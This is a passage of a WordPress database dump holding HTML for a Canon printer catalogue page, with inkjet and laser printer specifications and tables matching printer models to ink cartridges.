</td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:38:15','2019-09-24 07:38:15','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3295,1,'2019-09-24 15:38:44','2019-09-24 07:38:44','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>Â </p><p>Â </p><p>Â </p><center></center><center><br />[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>Â </p><p>Â </p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td 